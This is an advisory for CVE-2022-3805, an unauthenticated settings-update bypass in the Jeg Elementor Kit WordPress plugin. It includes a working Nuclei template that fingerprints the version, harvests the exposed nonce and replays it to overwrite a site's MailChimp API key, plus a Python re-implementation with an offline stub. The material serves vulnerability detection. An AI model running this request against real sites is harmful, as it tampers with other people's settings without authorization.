The Jeg Elementor Kit plugin for WordPress is vulnerable to authorization bypass in several functions that update the plugin's settings, in versions up to and including 2.5.6. The settings handlers are gated only by a nonce, and that nonce is printed into pages built with the plugin, so any unauthenticated visitor can read it and replay it to update the MailChimp API key, global styles, 404 page settings, and enabled elements. A WordPress nonce is a CSRF token, not a capability check: it proves the request originated from a page the site served, not that the sender is permitted to change settings. Fixed in 2.5.7.
PoC code [published]
id: CVE-2022-3805

info:
  name: Jeg Elementor Kit < 2.5.7 - Unauthenticated Settings Update
  author: DhiyaneshDk,popcorn94
  severity: high
  description: |
    The Jeg Elementor Kit plugin for WordPress is vulnerable to authorization bypass in various functions used to update the plugin settings in versions up to, and including, 2.5.6. Unauthenticated users can use an easily available nonce, obtained from pages edited by the plugin, to update the MailChimp API key, global styles, 404 page settings, and enabled elements.
  remediation: Fixed in 2.5.7
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3805
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jeg-elementor-kit/jeg-elementor-kit-256-unauthenticated-authorization-bypass
    - https://wordpress.org/plugins/jeg-elementor-kit/#developers
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/c9955d65-afb3-4d28-abd2-9f2fec92d013
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L
    cvss-score: 8.6
    cve-id: CVE-2022-3805
    cwe-id: CWE-862
    epss-score: 0.16755
    epss-percentile: 0.9467
    cpe: cpe:2.3:a:jegtheme:jeg_elementor_kit:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: jegtheme
    product: jeg_elementor_kit
    framework: wordpress
    shodan-query: http.html:"/wp-content/plugins/jeg-elementor-kit"
    fofa-query: body="/wp-content/plugins/jeg-elementor-kit/"
    publicwww-query: "/wp-content/plugins/jeg-elementor-kit/"
  tags: cve,cve2022,wordpress,wp,wp-plugin,jeg-elementor-kit,vkev,unauth,intrusive,vuln

variables:
  rand: "{{rand_text_numeric(5)}}"

flow: http(1) && http(2) && http(3)

http:
  # Step 1: fingerprint the installed version from the plugin's readme.txt
  - raw:
      - |
        GET /wp-content/plugins/jeg-elementor-kit/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'compare_versions(version, "< 2.5.7")'
          - 'contains(body, "Jeg Elementor Kit")'
          - 'status_code == 200'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: version
        part: body
        group: 1
        regex:
          - "(?mi)Stable tag: ([0-9.]+)"
        internal: true

  # Step 2: harvest the nonce the plugin prints into the front page
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "jeg-elementor-kit")
          - contains(content_type, "text/html")
        condition: and
        internal: true

    extractors:
      - type: regex
        group: 1
        name: nonce
        regex:
          - 'jkit_nonce = "([a-zA-Z0-9]{10})"'
        internal: true

      - type: regex
        group: 1
        name: url
        regex:
          - 'jkit_ajax_url = "(http[s]?://[^"]+)"'
        internal: true

  # Step 3: replay the nonce unauthenticated; this overwrites the MailChimp
  # API key with a random value, hence the intrusive tag
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        jkit-ajax-request=jkit_elements&form_data[mailchimp_api_key]={{rand}}&action=save_user_data&nonce={{nonce}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "Success Save Data")
          - contains(content_type, "application/json")
        condition: and
# digest: 490a00463044022000ed3bd419267f2bcbe99d93cc6c2d8b2cafd59024a77628b2529891325aae160220244143a89dcba13b88a9a2bd3e6905db85ed6df54256e7fcb2648b75f2cd2a17:922c64590222798bb761d5b6d8e72950
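The template above chains three requests: version fingerprint from readme.txt, nonce harvest from a page rendered by the plugin, and a replayed settings-update POST. The Python below is an added example, not part of the Nuclei template or of the plugin, that re-implements each step as a standalone function so the version comparison, the extraction regexes and the final matcher can be checked offline. All sample inputs (the readme, the inline script, the JSON reply) are constructed; the exact inline-script format and the JSON reply body are assumptions modelled on the template's regexes and matcher, and the `send` callback is a stand-in for the network call.

```python
# Added example (not part of the Nuclei template or of the plugin): an offline
# re-implementation of the template's three-step logic so each step can be
# checked on its own. All sample inputs are constructed; the inline-script
# format in SAMPLE_HTML and the JSON reply are assumptions modelled on the
# template's regexes and matcher.
import re
from urllib.parse import urlencode

FIXED_VERSION = "2.5.7"   # template: compare_versions(version, "< 2.5.7")

# --- constructed sample data (not captured from a real site) ----------------
SAMPLE_README = """=== Jeg Elementor Kit ===
Contributors: jegtheme
Tested up to: 6.1
Stable tag: 2.5.6
"""
SAMPLE_HTML = ('<script>var jkit_ajax_url = "https://example.com/"; '
               'var jkit_nonce = "a1b2c3d4e5";</script>')
SAMPLE_JSON = '{"message":"Success Save Data"}'


def parse_version(text):
    """'2.5.10' -> (2, 5, 10); compared as tuples, never as strings."""
    return tuple(int(p) for p in text.split(".") if p)


def stable_tag(readme):
    """Step 1a: the Stable tag of a WordPress plugin readme.txt, or None."""
    m = re.search(r"(?mi)^Stable tag:\s*([0-9.]+)", readme)
    return m.group(1) if m else None


def version_is_vulnerable(version, fixed=FIXED_VERSION):
    """Step 1b: numeric compare, so 2.5.10 is correctly treated as patched."""
    return parse_version(version) < parse_version(fixed)


def extract_jkit_params(html):
    """Step 2: (nonce, ajax_url) from the plugin's inline script, or (None, None)."""
    n = re.search(r'jkit_nonce\s*=\s*"([a-zA-Z0-9]{10})"', html)
    u = re.search(r'jkit_ajax_url\s*=\s*"(https?://[^"]+)"', html)
    return (n.group(1) if n else None, u.group(1) if u else None)


def build_update_body(nonce, api_key):
    """Step 3a: the form body the template posts. safe="[]" keeps the PHP
    array syntax literal, exactly as the template sends it."""
    return urlencode({
        "jkit-ajax-request": "jkit_elements",
        "form_data[mailchimp_api_key]": api_key,
        "action": "save_user_data",
        "nonce": nonce,
    }, safe="[]")


def settings_were_updated(status, content_type, body):
    """Step 3b: the template's final matcher (all three conditions must hold)."""
    return (status == 200
            and "application/json" in content_type
            and "Success Save Data" in body)


def check(readme, html, send, api_key="00000"):
    """Wire the steps together. `send(body)` performs the POST and returns
    (status, content_type, body); injecting it keeps this runnable offline.
    Caveat: a real send overwrites the site's MailChimp API key, which is why
    the template is tagged intrusive. Only run it against systems you own."""
    version = stable_tag(readme)
    if version is None:
        return "plugin readme not found"
    if not version_is_vulnerable(version):
        return "patched (%s)" % version
    nonce, _ajax_url = extract_jkit_params(html)
    if nonce is None:
        return "no jkit_nonce on page"
    status, ctype, body = send(build_update_body(nonce, api_key))
    return "vulnerable" if settings_were_updated(status, ctype, body) else "not confirmed"


def fake_success_send(body):
    """Stand-in for the network call: returns the constructed success reply."""
    return (200, "application/json; charset=UTF-8", SAMPLE_JSON)


if __name__ == "__main__":
    print(check(SAMPLE_README, SAMPLE_HTML, fake_success_send))   # vulnerable
```

The version comparison is the part most worth getting right: a lexicographic compare would rank "2.5.10" below "2.5.7" and report a patched site as vulnerable, which is why both the template's `compare_versions` and `parse_version` here compare numeric components. The `check` function stops before the intrusive step unless the version and nonce gates both pass, mirroring the template's `flow`.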